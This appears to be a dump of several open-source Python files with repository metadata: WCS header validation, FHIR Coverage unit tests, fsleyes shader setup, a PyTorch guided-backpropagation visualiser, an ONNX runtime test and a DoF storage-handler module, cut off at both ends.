subsequent_indent=' '))
else:
result.append(" No issues.")
return '\n'.join(result)
class _WcsValidateHduResult(list):
def __init__(self, hdu_index, hdu_name):
self._hdu_index = hdu_index
self._hdu_name = hdu_name
list.__init__(self)
def __repr__(self):
if len(self):
if self._hdu_name:
hdu_name = f' ({self._hdu_name})'
else:
hdu_name = ''
result = [f'HDU {self._hdu_index}{hdu_name}:']
for wcs in self:
result.append(repr(wcs))
return '\n'.join(result)
return ''
class _WcsValidateResults(list):
def __repr__(self):
result = []
for hdu in self:
content = repr(hdu)
if len(content):
result.append(content)
return '\n\n'.join(result)
global __warningregistry__
if isinstance(source, fits.HDUList):
hdulist = source
else:
hdulist = fits.open(source)
results = _WcsValidateResults()
for i, hdu in enumerate(hdulist):
hdu_results = _WcsValidateHduResult(i, hdu.name)
results.append(hdu_results)
with warnings.catch_warnings(record=True) as warning_lines:
wcses = find_all_wcs(
hdu.header, relax=_wcs.WCSHDR_reject,
fix=False, _do_set=False)
for wcs in wcses:
wcs_results = _WcsValidateWcsResult(wcs.wcs.alt)
hdu_results.append(wcs_results)
try:
del __warningregistry__
except NameError:
pass
with warnings.catch_warnings(record=True) as warning_lines:
warnings.resetwarnings()
warnings.simplefilter(
"always", FITSFixedWarning, append=True)
try:
WCS(hdu.header,
key=wcs.wcs.alt or ' ',
relax=_wcs.WCSHDR_reject,
fix=True, _do_set=False)
except WcsError as e:
wcs_results.append(str(e))
wcs_results.extend([str(x.message) for x in warning_lines])
return results
| 37.723322
| 114
| 0.547266
|
b153a27a2775d55cfb9d9a6f579d077c609ff818
| 7,554
|
py
|
Python
|
rdr_service/lib_fhir/fhirclient_3_0_0/models/coverage_tests.py
|
all-of-us/raw-data-repository
|
d28ad957557587b03ff9c63d55dd55e0508f91d8
|
[
"BSD-3-Clause"
] | 39
|
2017-10-13T19:16:27.000Z
|
2021-09-24T16:58:21.000Z
|
rdr_service/lib_fhir/fhirclient_3_0_0/models/coverage_tests.py
|
all-of-us/raw-data-repository
|
d28ad957557587b03ff9c63d55dd55e0508f91d8
|
[
"BSD-3-Clause"
] | 312
|
2017-09-08T15:42:13.000Z
|
2022-03-23T18:21:40.000Z
|
rdr_service/lib_fhir/fhirclient_3_0_0/models/coverage_tests.py
|
all-of-us/raw-data-repository
|
d28ad957557587b03ff9c63d55dd55e0508f91d8
|
[
"BSD-3-Clause"
] | 19
|
2017-09-15T13:58:00.000Z
|
2022-02-07T18:33:20.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 3.0.0.11832 on 2017-03-22.
# 2017, SMART Health IT.
import io
import json
import os
import unittest
from . import coverage
from .fhirdate import FHIRDate
class CoverageTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("Coverage", js["resourceType"])
return coverage.Coverage(js)
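# The tests below all follow the same round-trip pattern, sketched here with
# APIs already used in this file (the fixture name is one of the examples
# below):
#
#     inst = self.instantiate_from("coverage-example.json")
#     js = inst.as_json()               # back to a JSON-ready dict
#     inst2 = coverage.Coverage(js)     # rebuild and re-check the same fields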
def testCoverage1(self):
inst = self.instantiate_from("coverage-example-2.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage1(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage1(inst2)
def implCoverage1(self, inst):
self.assertEqual(inst.dependent, "1")
self.assertEqual(inst.grouping.group, "WESTAIR")
self.assertEqual(inst.grouping.groupDisplay, "Western Airlines")
self.assertEqual(inst.grouping.plan, "WESTAIR")
self.assertEqual(inst.grouping.planDisplay, "Western Airlines")
self.assertEqual(inst.grouping.subPlan, "D15C9")
self.assertEqual(inst.grouping.subPlanDisplay, "Platinum")
self.assertEqual(inst.id, "7546D")
self.assertEqual(inst.identifier[0].system, "http://xyz.com/codes/identifier")
self.assertEqual(inst.identifier[0].value, "AB98761")
self.assertEqual(inst.network, "5")
self.assertEqual(inst.order, 2)
self.assertEqual(inst.period.end.date, FHIRDate("2012-03-17").date)
self.assertEqual(inst.period.end.as_json(), "2012-03-17")
self.assertEqual(inst.period.start.date, FHIRDate("2011-03-17").date)
self.assertEqual(inst.period.start.as_json(), "2011-03-17")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.subscriberId, "AB9876")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the coverage</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "EHCPOL")
self.assertEqual(inst.type.coding[0].display, "extended healthcare")
self.assertEqual(inst.type.coding[0].system, "http://hl7.org/fhir/v3/ActCode")
def testCoverage2(self):
inst = self.instantiate_from("coverage-example-ehic.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage2(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage2(inst2)
def implCoverage2(self, inst):
self.assertEqual(inst.id, "7547E")
self.assertEqual(inst.identifier[0].system, "http://ehic.com/insurer/123456789/member")
self.assertEqual(inst.identifier[0].value, "A123456780")
self.assertEqual(inst.period.end.date, FHIRDate("2012-03-17").date)
self.assertEqual(inst.period.end.as_json(), "2012-03-17")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the European Health Insurance Card</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "EHCPOL")
self.assertEqual(inst.type.coding[0].display, "extended healthcare")
self.assertEqual(inst.type.coding[0].system, "http://hl7.org/fhir/v3/ActCode")
def testCoverage3(self):
inst = self.instantiate_from("coverage-example-selfpay.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage3(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage3(inst2)
def implCoverage3(self, inst):
self.assertEqual(inst.id, "SP1234")
self.assertEqual(inst.identifier[0].system, "http://hospitalx.com/selfpayagreement")
self.assertEqual(inst.identifier[0].value, "SP12345678")
self.assertEqual(inst.period.end.date, FHIRDate("2012-03-17").date)
self.assertEqual(inst.period.end.as_json(), "2012-03-17")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of a Self Pay Agreement.</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "pay")
self.assertEqual(inst.type.coding[0].display, "PAY")
self.assertEqual(inst.type.coding[0].system, "http://hl7.org/fhir/coverage-selfpay")
def testCoverage4(self):
inst = self.instantiate_from("coverage-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage4(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage4(inst2)
def implCoverage4(self, inst):
self.assertEqual(inst.dependent, "0")
self.assertEqual(inst.grouping.classDisplay, "Silver: Family Plan spouse only")
self.assertEqual(inst.grouping.class_fhir, "SILVER")
self.assertEqual(inst.grouping.group, "CBI35")
self.assertEqual(inst.grouping.groupDisplay, "Corporate Baker's Inc. Local #35")
self.assertEqual(inst.grouping.plan, "B37FC")
self.assertEqual(inst.grouping.planDisplay, "Full Coverage: Medical, Dental, Pharmacy, Vision, EHC")
self.assertEqual(inst.grouping.subClass, "Tier2")
self.assertEqual(inst.grouping.subClassDisplay, "Low deductable, max $20 copay")
self.assertEqual(inst.grouping.subGroup, "123")
self.assertEqual(inst.grouping.subGroupDisplay, "Trainee Part-time Benefits")
self.assertEqual(inst.grouping.subPlan, "P7")
self.assertEqual(inst.grouping.subPlanDisplay, "Includes afterlife benefits")
self.assertEqual(inst.id, "9876B1")
self.assertEqual(inst.identifier[0].system, "http://benefitsinc.com/certificate")
self.assertEqual(inst.identifier[0].value, "12345")
self.assertEqual(inst.period.end.date, FHIRDate("2012-05-23").date)
self.assertEqual(inst.period.end.as_json(), "2012-05-23")
self.assertEqual(inst.period.start.date, FHIRDate("2011-05-23").date)
self.assertEqual(inst.period.start.as_json(), "2011-05-23")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.sequence, "9")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the coverage</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "EHCPOL")
self.assertEqual(inst.type.coding[0].display, "extended healthcare")
self.assertEqual(inst.type.coding[0].system, "http://hl7.org/fhir/v3/ActCode")
| 50.697987
| 157
| 0.679243
|
163b0af331fa9afffe08f52702ba018aea44269c
| 4,692
|
py
|
Python
|
fsleyes/gl/gl14/glvector_funcs.py
|
pauldmccarthy/fsleyes
|
453a6b91ec7763c39195814d635257e3766acf83
|
[
"Apache-2.0"
] | 12
|
2018-05-05T01:36:25.000Z
|
2021-09-23T20:44:08.000Z
|
fsleyes/gl/gl14/glvector_funcs.py
|
pauldmccarthy/fsleyes
|
453a6b91ec7763c39195814d635257e3766acf83
|
[
"Apache-2.0"
] | 97
|
2018-05-05T02:17:23.000Z
|
2022-03-29T14:58:42.000Z
|
fsleyes/gl/gl14/glvector_funcs.py
|
pauldmccarthy/fsleyes
|
453a6b91ec7763c39195814d635257e3766acf83
|
[
"Apache-2.0"
] | 6
|
2017-12-09T09:02:00.000Z
|
2021-03-05T18:55:13.000Z
|
#!/usr/bin/env python
#
# glvector_funcs.py - Functions used by glrgbvector_funcs and
# gllinevector_funcs.
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
"""This module contains logic for managing vertex and fragment shader programs
used for rendering :class:`.GLRGBVector` and :class:`.GLLineVector` instances.
These functions are used by the :mod:`.gl14.glrgbvector_funcs` and
:mod:`.gl14.gllinevector_funcs` modules.
"""
import numpy as np
import fsl.data.constants as constants
import fsl.transform.affine as affine
import fsleyes.gl.shaders as shaders
def destroy(self):
"""Destroys the vertex/fragment shader programs created in :func:`init`.
"""
self.shader.destroy()
self.shader = None
def compileShaders(self, vertShader):
"""Compiles the vertex/fragment shader programs (by creating a
:class:`.GLSLShader` instance).
If the :attr:`.VectorOpts.colourImage` property is set, the ``glvolume``
fragment shader is used. Otherwise, the ``glvector`` fragment shader
is used.
"""
if self.shader is not None:
self.shader.destroy()
opts = self.opts
useVolumeFragShader = opts.colourImage is not None
if useVolumeFragShader: fragShader = 'glvolume'
else: fragShader = 'glvector'
vertSrc = shaders.getVertexShader( vertShader)
fragSrc = shaders.getFragmentShader(fragShader)
if useVolumeFragShader:
textures = {
'clipTexture' : 1,
'imageTexture' : 2,
'colourTexture' : 3,
'negColourTexture' : 3,
# glvolume frag shader expects a modulate
# alpha texture, but it is not used
'modulateTexture' : 1,
}
else:
textures = {
'modulateTexture' : 0,
'clipTexture' : 1,
'vectorTexture' : 4,
}
self.shader = shaders.ARBPShader(vertSrc,
fragSrc,
shaders.getShaderDir(),
textures)
def updateShaderState(self):
"""Updates the state of the vector vertex and fragment shaders - the
fragment shader may be either the ``glvolume`` or the ``glvector``
shader.
"""
opts = self.opts
useVolumeFragShader = opts.colourImage is not None
modLow, modHigh = self.getModulateRange()
clipLow, clipHigh = self.getClippingRange()
modMode = {'brightness' : -0.5,
'alpha' : 0.5}[opts.modulateMode]
clipping = [clipLow, clipHigh, -1, -1]
if np.isclose(modHigh, modLow):
mod = [0, 0, 0, 0]
else:
mod = [modLow, modHigh, 1.0 / (modHigh - modLow), modMode]
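# Illustrative reading of the packed parameter (an interpretation, not taken
# from the shader source): with modLow=0.2 and modHigh=0.7 the fragment
# program can recover a 0..1 modulation factor as
#     (value - mod[0]) * mod[2]  ==  (value - 0.2) * 2.0
# while mod[3] (+/-0.5) encodes whether brightness or alpha is modulated.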
# Inputs which are required by both the
# glvolume and glvector fragment shaders
self.shader.setFragParam('clipping', clipping)
clipCoordXform = self.getAuxTextureXform('clip')
colourCoordXform = self.getAuxTextureXform('colour')
modCoordXform = self.getAuxTextureXform('modulate')
self.shader.setVertParam('clipCoordXform', clipCoordXform)
self.shader.setVertParam('colourCoordXform', colourCoordXform)
self.shader.setVertParam('modCoordXform', modCoordXform)
if useVolumeFragShader:
voxValXform = self.colourTexture.voxValXform
cmapXform = self.cmapTexture.getCoordinateTransform()
voxValXform = affine.concat(cmapXform, voxValXform)
voxValXform = [voxValXform[0, 0], voxValXform[0, 3], 0, 0]
self.shader.setFragParam('voxValXform', voxValXform)
# settings expected by glvolume
# frag shader, but not used
self.shader.setFragParam('negCmap', [-1, 0, 0, 0])
self.shader.setFragParam('modulate', [0, 0, -1, 1])
else:
colours, colourXform = self.getVectorColours()
# See comments in gl21/glvector_funcs.py
if self.vectorImage.niftiDataType == constants.NIFTI_DT_RGB24:
voxValXform = affine.scaleOffsetXform(2, -1)
else:
voxValXform = self.imageTexture.voxValXform
voxValXform = [voxValXform[0, 0], voxValXform[0, 3], 0, 0]
self.shader.setFragParam('voxValXform', voxValXform)
self.shader.setFragParam('mod', mod)
self.shader.setFragParam('xColour', colours[0])
self.shader.setFragParam('yColour', colours[1])
self.shader.setFragParam('zColour', colours[2])
self.shader.setFragParam('colourXform', [colourXform[0, 0],
colourXform[0, 3], 0, 0])
return True
| 33.514286
| 78
| 0.618713
|
dd808f3d00340b79710009f9ac8c29c92e4b3c26
| 2,749
|
py
|
Python
|
activation_maps/guided_backprop.py
|
fhalamos/predicting-poverty-replication
|
55c94cf6bd31b4f99c059167c0c031126160d3bd
|
[
"MIT"
] | 59
|
2019-10-24T23:33:22.000Z
|
2022-03-23T06:04:50.000Z
|
activation_maps/guided_backprop.py
|
fhalamos/predicting-poverty-replication
|
55c94cf6bd31b4f99c059167c0c031126160d3bd
|
[
"MIT"
] | 8
|
2020-02-27T15:50:45.000Z
|
2022-03-12T00:03:04.000Z
|
activation_maps/guided_backprop.py
|
fhalamos/predicting-poverty-replication
|
55c94cf6bd31b4f99c059167c0c031126160d3bd
|
[
"MIT"
] | 36
|
2019-11-08T18:03:17.000Z
|
2022-02-16T00:28:59.000Z
|
"""
Taken directly from https://github.com/utkuozbulak/pytorch-cnn-visualizations
"""
import torch
from torch.nn import ReLU
class GuidedBackprop():
"""
Produces gradients generated with guided back propagation from the given image
"""
def __init__(self, model):
self.model = model
self.gradients = None
self.forward_relu_outputs = []
# Put model in evaluation mode
self.model.eval()
self.update_relus()
self.hook_layers()
def hook_layers(self):
def hook_function(module, grad_in, grad_out):
self.gradients = grad_in[0]
# Register hook to the first layer
first_layer = list(self.model.features._modules.items())[0][1]
first_layer.register_backward_hook(hook_function)
def update_relus(self):
"""
Updates ReLU activation functions so that they:
1- store the output in the forward pass
2- impute zero for gradient values that are less than zero
"""
def relu_backward_hook_function(module, grad_in, grad_out):
"""
If there is a negative gradient, change it to zero
"""
# Get last forward output
corresponding_forward_output = self.forward_relu_outputs[-1]
corresponding_forward_output[corresponding_forward_output > 0] = 1
modified_grad_out = corresponding_forward_output * torch.clamp(grad_in[0], min=0.0)
del self.forward_relu_outputs[-1] # Remove last forward output
return (modified_grad_out,)
def relu_forward_hook_function(module, ten_in, ten_out):
"""
Store results of forward pass
"""
self.forward_relu_outputs.append(ten_out)
# Loop through layers, hook up ReLUs
for pos, module in self.model.features._modules.items():
if isinstance(module, ReLU):
module.register_backward_hook(relu_backward_hook_function)
module.register_forward_hook(relu_forward_hook_function)
def generate_gradients(self, input_image, target_class):
self.model.zero_grad()
# Forward pass
model_output = self.model(input_image)
# Zero gradients
self.model.zero_grad()
# Target for backprop
one_hot_output = torch.FloatTensor(1, model_output.size()[-1]).zero_()
one_hot_output[0][target_class] = 1
# Backward pass
model_output.backward(gradient=one_hot_output)
# Convert Pytorch variable to numpy array
# [0] to get rid of the first channel (1,3,224,224)
gradients_as_arr = self.gradients.data.numpy()[0]
return gradients_as_arr
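# A minimal usage sketch (model choice and input preparation are assumptions,
# not part of this file; any network exposing a ``features`` module works):
#
#     import torch
#     from torchvision import models
#     model = models.vgg16(pretrained=True)
#     gbp = GuidedBackprop(model)
#     image = torch.randn(1, 3, 224, 224, requires_grad=True)  # stand-in input
#     grads = gbp.generate_gradients(image, target_class=243)
#     # grads has shape (3, 224, 224), ready for saliency visualisation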
| 37.657534
| 95
| 0.636595
|
1a519329eb4ae5d7f7b589948e2782d816f96ba8
| 257
|
py
|
Python
|
backend/apps/cmdb/serializers/__init__.py
|
codelieche/erp
|
96861ff63a63a93918fbd5181ffb2646446d0eec
|
[
"MIT"
] | null | null | null |
backend/apps/cmdb/serializers/__init__.py
|
codelieche/erp
|
96861ff63a63a93918fbd5181ffb2646446d0eec
|
[
"MIT"
] | 29
|
2020-06-05T19:57:11.000Z
|
2022-02-26T13:42:36.000Z
|
backend/apps/cmdb/serializers/__init__.py
|
codelieche/erp
|
96861ff63a63a93918fbd5181ffb2646446d0eec
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
from .model import ModelSerializer, ModelInfoSerializer
from .field import FieldModelSerializer
from .instance import InstanceModelSerializer
from .value import ValueModelSerializer
from .permission import PermissionModelSerializer
| 28.555556
| 55
| 0.836576
|
6d7982488c483b16ccf1c5f948b286d9e61e878f
| 1,976
|
py
|
Python
|
_unittests/ut_onnxrt/test_rt_valid_model_normalizer.py
|
henrywu2019/mlprodict
|
4c09dc39d5ba7a7235fa321d80c81b5bf4f078ad
|
[
"MIT"
] | 1
|
2020-12-18T03:49:53.000Z
|
2020-12-18T03:49:53.000Z
|
_unittests/ut_onnxrt/test_rt_valid_model_normalizer.py
|
henrywu2019/mlprodict
|
4c09dc39d5ba7a7235fa321d80c81b5bf4f078ad
|
[
"MIT"
] | null | null | null |
_unittests/ut_onnxrt/test_rt_valid_model_normalizer.py
|
henrywu2019/mlprodict
|
4c09dc39d5ba7a7235fa321d80c81b5bf4f078ad
|
[
"MIT"
] | null | null | null |
"""
@brief test log(time=9s)
"""
import unittest
from logging import getLogger
from pyquickhelper.loghelper import fLOG
from pyquickhelper.pycode import ExtTestCase
from sklearn.exceptions import ConvergenceWarning
try:
from sklearn.utils._testing import ignore_warnings
except ImportError:
from sklearn.utils.testing import ignore_warnings
from skl2onnx import __version__ as skl2onnx_version
from mlprodict.onnxrt.validate import enumerate_validated_operator_opsets
class TestRtValidateNormalizer(ExtTestCase):
@ignore_warnings(category=(UserWarning, ConvergenceWarning, RuntimeWarning))
def test_rt_Normalizer_onnxruntime(self):
fLOG(__file__, self._testMethodName, OutputPrint=__name__ == "__main__")
logger = getLogger('skl2onnx')
logger.disabled = True
verbose = 1 if __name__ == "__main__" else 0
buffer = []
def myprint(*args, **kwargs):
buffer.append(" ".join(map(str, args)))
rows = list(enumerate_validated_operator_opsets(
verbose, models={"Normalizer"},
fLOG=myprint,
runtime='onnxruntime2', debug=True))
self.assertGreater(len(rows), 1)
self.assertGreater(len(buffer), 1)
@ignore_warnings(category=(UserWarning, ConvergenceWarning, RuntimeWarning))
def test_rt_Normalizer_python(self):
fLOG(__file__, self._testMethodName, OutputPrint=__name__ == "__main__")
logger = getLogger('skl2onnx')
logger.disabled = True
verbose = 1 if __name__ == "__main__" else 0
buffer = []
def myprint(*args, **kwargs):
buffer.append(" ".join(map(str, args)))
rows = list(enumerate_validated_operator_opsets(
verbose, models={"Normalizer"},
fLOG=myprint,
runtime='python', debug=True))
self.assertGreater(len(rows), 1)
self.assertGreater(len(buffer), 1)
if __name__ == "__main__":
unittest.main()
| 32.933333
| 80
| 0.681174
|
6fce29d6d02940925223992774320049add136f0
| 28,894
|
py
|
Python
|
dof/storage.py
|
hyperrixel/dof
|
4f1500fd7c78a438f0812e46a3938a8dbd2b0db7
|
[
"MIT"
] | null | null | null |
dof/storage.py
|
hyperrixel/dof
|
4f1500fd7c78a438f0812e46a3938a8dbd2b0db7
|
[
"MIT"
] | null | null | null |
dof/storage.py
|
hyperrixel/dof
|
4f1500fd7c78a438f0812e46a3938a8dbd2b0db7
|
[
"MIT"
] | null | null | null |
"""
DoF - Deep Model Core Output Framework
======================================
Submodule: storage
"""
from abc import ABC, abstractmethod
import json
from os import listdir
from os.path import isfile, join
import pickle
from .error import DofError
class DofObjectHandler(ABC):
"""
Abstract class (de facto interface) to provide storage management of data
=========================================================================
Attributes
----------
handler_type : str (read-only)
Get the type of the handler.
is_closed : bool (abstract) (read-only)
Get whether the handler is closed or not.
is_open : bool (abstract) (read-only)
Get whether the handler is open or not.
"""
# These variables should be static class level constants, but this is
# outside the capabilities of Python.
LOCAL = 'local'
ONLINE = 'online'
@abstractmethod
def __init__(self, handler_type : str, *args, **kwargs):
"""
Semi-abstract method to initialize an instance of the object
============================================================
Parameters
----------
handler_type : str
Type of the DofObjectHandler. Should be DofObjectHandler.LOCAL or
DofObjectHandler.ONLINE.
Raises
------
DofError
When the given handler type is not suppported.
"""
if handler_type in [DofObjectHandler.LOCAL, DofObjectHandler.ONLINE]:
self.__handler_type = handler_type
else:
raise DofError('DofObjectHandler.init(): unsupported handler type.')
@abstractmethod
def close(self):
"""
Abstract method to close the connection with the storage
========================================================
"""
@abstractmethod
def exist(self, location : str, is_relative : bool = True) -> bool:
"""
Abstract method to check the existence of a file
================================================
Parameters
----------
location : str
Location to check.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
bool
True if file exists, False if not.
"""
@abstractmethod
def files(self, location : str, is_relative : bool = True) -> list:
"""
Abstract method to get list of files in a directory
===================================================
Parameters
----------
location : str
Location to check.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
list
List of files, empty list if no files.
"""
@property
def handler_type(self) -> str:
"""
Get the type of the handler
===========================
Returns
-------
str
Type of the handler.
See Also:
Handler types : DofObjectHandler.LOCAL, DofObjectHandler.ONLINE
"""
return self.__handler_type
@property
@abstractmethod
def is_closed(self) -> bool:
"""
Get whether the handler is closed or not
========================================
Returns
-------
bool
True if handler is closed, False if not.
"""
@property
@abstractmethod
def is_open(self) -> bool:
"""
Abstract method to get whether the handler is open or not
=========================================================
Returns
-------
bool
True if handler is open, False if not.
"""
@abstractmethod
def load_as_binary(self, location : str,
is_relative : bool = True) -> bytearray:
"""
Abstract method to load data as binary data
===========================================
Parameters
----------
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
bytearray
The loaded data as a bytearray.
"""
@abstractmethod
def load_as_instance(self, location : str,
is_relative : bool = True) -> any:
"""
Abstract method to load data as instance
========================================
Parameters
----------
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
any
The loaded data as a Python instance.
"""
@abstractmethod
def load_as_json(self, location : str,
is_relative : bool = True) -> any:
"""
Abstract method to load data as JSON data
=========================================
Parameters
----------
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
any
The loaded data, parsed from JSON.
"""
@abstractmethod
def load_as_text(self, location : str, is_relative : bool = True) -> str:
"""
Abstract method to load data as text
====================================
Parameters
----------
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
str
The loaded data as a string.
"""
@abstractmethod
def open(self):
"""
Abstract method to open the connection with the storage
=======================================================
"""
@abstractmethod
def save_as_binary(self, data : any, location : str,
is_relative : bool = True):
"""
Abstract method to save data as binary
======================================
Parameters
----------
data : any
Data to save in the form true binary data.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Notes
-----
When implementing this function, please keep in mind that data can be
anything. It depends on the use case how data should be
processed to achieve a binary form to save. Saving data in pure
binary form (not pickle) can be a good basis for building platform
(programming language) agnostic frameworks.
"""
@abstractmethod
def save_as_instance(self, data : any, location : str,
is_relative : bool = True):
"""
Abstract method to save data as instance
========================================
Parameters
----------
data : any
Data to save in the form a python instance.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Notes
-----
When implementing this function please keep in mind that data should
be saved as an instance (in most cases a Python instance).
"""
@abstractmethod
def save_as_json(self, data : any, location : str,
is_relative : bool = True):
"""
Abstract method to save data as JSON data
=========================================
Parameters
----------
data : any
Data to save in the form JSON.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Notes
-----
When implementing this function please keep in mind that data should
be saved as JSON and that not everything is serializable on its own.
"""
@abstractmethod
def save_as_text(self, data : any, location : str,
is_relative : bool = True):
"""
Abstract method to save data as text
====================================
Parameters
----------
data : any
Data to save as text.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Notes
-----
When implementing this function please keep in mind that data can be
anything. It depends on the use case how data should be processed to
achieve a text form to save.
"""
class DofSerializable:
"""
Provide serializability functions
=================================
"""
@abstractmethod
def from_json(self, json_string : str, **kwargs) -> any:
"""
Abstract method to build object from JSON string
================================================
Parameters
----------
json_string : str
The JSON formatted string that contains all the needed data.
keyword arguments
Arguments to forward to the json.loads() function.
Returns
-------
any
The object that is created.
Notes
-----
This function requires a JSON string that is created with the
.to_json(describe_only=False) function.
"""
def to_json(self, describe_only : bool = True, **kwargs) -> str:
"""
Create JSON from an instance
============================
Parameters
----------
describe_only : bool, optional (True if omitted)
Whether the JSON output should be a whole instance or not. If the
value is False, the function returns all data of the instance that
is needed to restore exactly the same instance. If the value is
True, only those data should be included which are essential to
describe the data.
keyword arguments
Arguments to forward to the json.dumps() function.
Returns
-------
str
JSON formatted string.
Notes
-----
If the value of the describe_only parameter is True, only description
data is returned. This means the dataset won't be included. It does
not matter whether the data elements are images or strings. The goal
of describe_only is not to store the data but to describe it.
"""
data = self.to_json_dict(describe_only=describe_only)
return json.dumps(data, **kwargs)
@abstractmethod
def to_json_dict(self, describe_only : bool = True) -> dict:
"""
Abstract method to create a JSON-compatible dict from the instance
==================================================================
Parameters
----------
describe_only : bool, optional (True if omitted)
Whether the JSON output should be a whole instance or not. If the
value is False, the function returns all data of the instance that
is needed to restore exactly the same instance. If the value is
True, only those data should be included which are essential to
describe the data.
Returns
-------
dict
Dict that is compatible with creating a JSON formatted string.
Notes
-----
If the value of the describe_only parameter is True, only description
data is returned. This means the dataset won't be included. It does
not matter whether the data elements are images or strings. The goal
of describe_only is not to store the data but to describe it.
"""
class LocalHandler(DofObjectHandler):
"""
Local storage handler
=====================
Attributes
----------
encoding : str
Encoding type for files with textual content (text, JSON).
handler_type : str (inherited) (read-only)
Get the type of the handler.
is_closed : bool (read-only)
Get whether the handler is closed or not.
is_open : bool (read-only)
Get whether the handler is open or not.
"""
def __init__(self, base_path : str = './', encoding : str = 'utf8'):
"""
Initialize an instance of the object
====================================
Parameters
----------
base_path : str, optional (./ if omitted)
Base path to be used on loading or saving files.
encoding : str, optional (utf8 if omitted)
Encoding type of textual files like text and JSON files.
"""
super().__init__(DofObjectHandler.LOCAL)
self.__base_path = base_path
self.__is_open = False
self.__encoding = encoding
def close(self):
"""
Close the connection with the storage
=====================================
"""
self.__is_open = False
@property
def encoding(self) -> str:
"""
Get encoding for textual files
==============================
Returns
-------
str
The identifier of the currently used encoding method.
"""
return self.__encoding
@encoding.setter
def encoding(self, newvalue : str):
"""
Set encoding for textual files
==============================
Parameters
----------
newvalue : str
The identifier of the new encoding method.
"""
self.__encoding = newvalue
@property
def is_closed(self) -> bool:
"""
Get whether the handler is closed or not
========================================
Returns
-------
bool
True if handler is closed, False if not.
"""
return not self.__is_open
@property
def is_open(self) -> bool:
"""
Get whether the handler is open or not
======================================
Returns
-------
bool
True if handler is open, False if not.
"""
return self.__is_open
def exist(self, location : str, is_relative : bool = True) -> bool:
"""
Check whether a file exists
===========================
Parameters
----------
location : str
Location to check.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
bool
True if file exists, False if not.
"""
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
return isfile(_location)
def files(self, location : str, is_relative : bool = True) -> list:
"""
Get list of files in a directory
================================
Parameters
----------
location : str
Location to check.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
list
List of files, empty list if no files.
"""
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
return [f for f in listdir(_location) if isfile(join(_location, f))]
def load_as_binary(self, location : str,
is_relative : bool = True) -> bytearray:
"""
Load data as binary data
========================
Parameters
----------
location : str
Location to load from.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
bytearray
Loaded data as a bytearray.
Raises
------
DofError
If the handler is not yet or no longer open.
DofError
If the target file doesn't exist.
"""
if not self.__is_open:
